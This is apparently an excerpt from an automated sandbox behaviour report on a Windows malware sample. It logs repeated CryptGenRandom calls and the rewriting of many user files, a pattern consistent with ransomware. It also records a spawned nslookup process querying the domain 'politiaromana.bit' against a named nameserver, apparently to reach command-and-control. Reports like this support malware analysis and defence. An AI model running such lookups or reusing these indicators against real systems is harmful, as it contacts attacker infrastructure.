| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\4z3uag.rtf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\BokNObz8UcZzwf.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\BokNObz8UcZzwf.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\rYZw8NqY13.ots, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\rYZw8NqY13.ots, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\Kn7qhmeLrMy5AdqLU92.xlsx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\Kn7qhmeLrMy5AdqLU92.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\sDKhau.doc, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\sDKhau.doc, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\8qGeXH1kIXTzNAwh1.pptx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\8qGeXH1kIXTzNAwh1.pptx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\991tuWIWnfwOaO.rtf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\991tuWIWnfwOaO.rtf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\LOFKJdnEn4MzMXm.rtf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\LOFKJdnEn4MzMXm.rtf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\RH3IiU0yMrDFNR6DKs.pdf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\RH3IiU0yMrDFNR6DKs.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\iWJTz4KEmPveSMxUQ8.bmp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\iWJTz4KEmPveSMxUQ8.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\qU7Og9CaR8xuh.rtf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\qU7Og9CaR8xuh.rtf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\lEAREuPn69.mp4, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\lEAREuPn69.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\qnnrT9SEOOv4oMd88.jpg, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\qnnrT9SEOOv4oMd88.jpg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\eCV9B6Keul.docx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\eCV9B6Keul.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\pWw3Texk6CwVcTz.odp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\pWw3Texk6CwVcTz.odp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\TkryzlAhWDjxy.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\TkryzlAhWDjxy.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\NXOcFmcZH0kfs1V2.xls, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\NXOcFmcZH0kfs1V2.xls, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\cxc1c8A9xEZm1pp.xlsx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\cxc1c8A9xEZm1pp.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\FsFwfuaCG.csv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\FsFwfuaCG.csv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\1F9dzJR3Dq.wav, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\1F9dzJR3Dq.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\o4isx.png, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\o4isx.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\2XzzHT1hfS0s9l.docx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\2XzzHT1hfS0s9l.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\m9asRMP8HoSL6.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\m9asRMP8HoSL6.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\PlmVZkn.csv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\PlmVZkn.csv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\D9xhD4Vtl9zeKaqi.mkv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\D9xhD4Vtl9zeKaqi.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\diCHxx1R37p96mJV.ppt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\diCHxx1R37p96mJV.ppt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\8KdP1zVgyza2WB4YuYBy.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\8KdP1zVgyza2WB4YuYBy.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\9HqwEbX7Ln7H.wav, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\9HqwEbX7Ln7H.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\9ZTbafp.mp3, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\9ZTbafp.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\EdkUgdunNhUsDwiV5VL.xlsx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = Z:\EdkUgdunNhUsDwiV5VL.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\RxFoEpC5uC.xlsx, type = file_attributes |
|
1 |
Process #7: nslookup.exe
8
19
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\syswow64\nslookup.exe |
| Command Line | nslookup politiaromana.bit ns1.virmach.ru |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:00:58, Reason: Child Process |
| Unmonitor | End Time: 00:03:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:25 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb74 |
| Parent PID | 0xfd8 (c:\users\nd9e1fyi\appdata\roamingqtp35.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
ACC
0x
BD4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00021fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00044fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d3fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f1fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x0013ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x0017ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00190fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00400000 | 0x004bdfff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000004c0000 | 0x004c0000 | 0x00647fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x007d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x00bdafff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000e40000 | 0x00e40000 | 0x00e41fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000e40000 | 0x00e40000 | 0x00e43fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000e70000 | 0x00e70000 | 0x00e7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| imm32.dll | 0x00e80000 | 0x00ea9fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000fd0000 | 0x00fd0000 | 0x010cffff | Private Memory | Readable, Writable |
|
|
|
- |
| nslookup.exe | 0x01380000 | 0x01396fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x00000000013a0000 | 0x013a0000 | 0x0539ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00000000053a0000 | 0x053a0000 | 0x0679ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x067a0000 | 0x06ad6fff | Memory Mapped File | Readable |
|
|
|
- |
| wow64win.dll | 0x5d0b0000 | 0x5d129fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x5d130000 | 0x5d17ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x5d180000 | 0x5d187fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winrnr.dll | 0x6f8c0000 | 0x6f8cafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nlaapi.dll | 0x6f8d0000 | 0x6f8e3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pnrpnsp.dll | 0x6f8f0000 | 0x6f905fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| napinsp.dll | 0x6f910000 | 0x6f921fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fwpuclnt.dll | 0x71770000 | 0x717b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x717c0000 | 0x717c7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x717d0000 | 0x717fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x71810000 | 0x71893fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x718a0000 | 0x718eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcrypt.dll | 0x73a50000 | 0x73a6afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x73da0000 | 0x73da9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x73db0000 | 0x73dcdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcryptprimitives.dll | 0x741e0000 | 0x74237fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x75650000 | 0x75693fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x756a0000 | 0x7575dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75900000 | 0x7592afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75bf0000 | 0x75ccffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x75ef0000 | 0x75f9cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
